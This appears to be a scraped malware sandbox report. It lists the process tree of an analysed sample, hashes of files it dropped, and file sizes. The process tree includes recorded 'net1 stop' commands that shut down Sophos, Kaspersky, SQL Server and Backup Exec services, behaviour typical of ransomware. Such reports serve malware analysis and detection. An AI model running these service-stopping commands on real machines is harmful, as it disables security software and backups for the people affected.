C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-258108350-207358318915928490822065583563-542456704657139381567612800-1763430051"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "9712752851987935180-120984817973655821745199040455003122-31697895761961268"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-865400079759553535-138786837-1685369828-1287373179-655947402306692373-93610526"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2088400827913928320-1679373069-127017542029051395819772741007003613621282224517"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-852415118-281453713906780-48517680578580797787677992220454377301808598116"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "211145593019387020243669621941812988649-22948921422958941070690668502969513"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "364004974-160029028854279678613824961415273101911864230350883957455-1290272900"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-243652881-2117715847909379256-193609797814242911751730368694-1243113655181516277"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-342406381-82729408717484771328435424643808594341608629999-2546527821495145157"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-619291495-1021269537-6199210331019917260-1463638649-10255117871439716075-1378976133"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1754566915-661068190212110578292241199818759527-236531098-1993122587-755445002"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "63924445-311163906-65567974720204008219654309262162962014045835852036949131"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1757361941-14877822271966852334-1554153376-362892816-1699918695-52611629-68018949"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2139532424412280695-42670751214772865741525488356-510608591717127890182388864"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1970182377-2009534742-1892409720-16589687001317225215-1614160222430814850-1771781139"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1418386691-678313755-1953715690-696089611-12668775521579778632019106611366077761"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1952828809-831695083100935293419015257051798919638-14728661672023293094414061029"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-5518075031097361395-623819339-1216747360-2029972739-1000197792-395079105-830779265"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "16726183292042868807-1309713186-766131982-1472993552145087980-886798531-109555802"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "167527910651371115-2009766897895634290-19569295581275579717-13431967232116956870"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "793649-781781483-1737480278-11476875985075963002146328008-174529171-777614706"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1983624439-1111746743163889222672185356-598092758-2116130555286665425-309310651"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-518871472-1943174264-127763377-1997128843-1905674716-494532595-1058862042-2008546727"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-19225658431223037636-15732531941070789102-479895816-191388534-1668694970-1049036764"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-548130470-2033273592415620034160984215-176703528221391450820760218911872863936"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-106828395-301874215963938661-1380120667-20829121731605129456-1549419658-83717386"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1826883245184156159556266514880206791213439540-76095764115296093-1495995123"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-4068652751040788334-175087201410904203034325245741053277824-19914461001888345847"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1458336489-525663913-171454353-182890548512032386-430469477-6562720581252391118"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1755944368-21159790001783404292650122410-1393923923-1443906216-1473595201-657476408"1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
61a03d15cf62612f50b74867090dbe79
SHA115228f34067b4b107e917bebaf17cc7c3c1280a8
SHA256f9e23dc21553daa34c6eb778cd262831e466ce794f4bea48150e8d70d3e6af6d
SHA5125fece89ccbbf994e4f1e3ef89a502f25a72f359d445c034682758d26f01d9f3aa20a43010b9a87f2687da7ba201476922aa46d4906d442d56eb59b2b881259d3
-
MD5
f9e8de02d74cc008dfa3812fe134f155
SHA1c71a858b0ad8fb80ac3fa74a2e45aec0d9f59c71
SHA25690bdc06e00ff4d2f32c6ef4bd92e61828019ec35e79a07735545627d3121b7b5
SHA512c09c3748133c5d83f7d55accdc44b908388b08cd79b268393195da081c44c1bc63d767085bca22c009b2819806ae89d2b9e986f291baa0534629e561ee329af0
-
MD5
6f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
MD5
354b8209f647a42e2ce36d8cf326cc92
SHA198c3117f797df69935f8b09fc9e95accfe3d8346
SHA256feae405d288fdd38438f9d9b54f791f3ce3805f1bb88780da5aca402ad372239
SHA512420be869b58e9a7a2c31f2550ac269df832935692a6431d455a10d9b426781e79d91e30ace2c465633b8a7ff2be1bf49734d8b99a390090dc4b36411d4391ff0
-
MD5
d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
MD5
e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
MD5
faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
MD5
7f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
MD5
51d5c55b426538ecce50703009124c2c
SHA1def6cc482ffcf2a5430d04a008669319a20e33ce
SHA256261aa0c9834441c993b0df121fb3bd1f82f949260ffd072589d1a28a61bd144d
SHA5120025e3d579ae89d9e7cc94a843be921047655d86f8122203abc1e2b9dc03d148c6a77a5bd09a59ac1bc813edc756dc13653c56387ffdd59177e95cc4c5417d77
-
MD5
6f47970bd915ab3d24f0cf5a24223718
SHA1791ba6733e718d5289b5e7e13d13efb93ec5033f
SHA2562c5817a56e387283e450cf2abeb4c3e97bd53de135219325c104058c533f6b60
SHA512fdd894c26079854ee4d02e906bea472b49484cd4293a33edbe6c4c091473ef1ddbeb09669625166a36218501a35467a2013b59e44ee20cbc31050836e89640ac
-
MD5
be1ed0e891f3b3a16d3d8aec205b9597
SHA12dc468c6d5cbd9faa5c9d07492f0c4c9099cf67b
SHA2567c5ea4bcff28d0cb3a45ae2cb5153be981a612acc6e6b5638a1f271ce872a958
SHA512a142a3405f38050fa4e34030dc941e2191b87e6c7cd8bb171c45544ed1697d6c6210b6e1030611e4abaf903fb9b73cc92bfe9bc4b6fe146bde0e33088756e4da
-
MD5
33b2c2073797028f0b2ee88b0c216c5a
SHA1c21d0c1a964deb66e217bfe5ac42218e5534d1e9
SHA25654e67fd8244173edde5c087b969ff5b54539071b4fa93ce99f13174f119e856d
SHA51220723cd69a316b0fe36a7895b617da649f9bbfcee4c81ecfc99bd543a4eeee11317af9bdbda7422307525e58d24385de4310649be28a04d7eb9f83ce3a436d9a
-
MD5
33b2c2073797028f0b2ee88b0c216c5a
SHA1c21d0c1a964deb66e217bfe5ac42218e5534d1e9
SHA25654e67fd8244173edde5c087b969ff5b54539071b4fa93ce99f13174f119e856d
SHA51220723cd69a316b0fe36a7895b617da649f9bbfcee4c81ecfc99bd543a4eeee11317af9bdbda7422307525e58d24385de4310649be28a04d7eb9f83ce3a436d9a
-
MD5
33b2c2073797028f0b2ee88b0c216c5a
SHA1c21d0c1a964deb66e217bfe5ac42218e5534d1e9
SHA25654e67fd8244173edde5c087b969ff5b54539071b4fa93ce99f13174f119e856d
SHA51220723cd69a316b0fe36a7895b617da649f9bbfcee4c81ecfc99bd543a4eeee11317af9bdbda7422307525e58d24385de4310649be28a04d7eb9f83ce3a436d9a
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
8KB
-
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.9MB
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB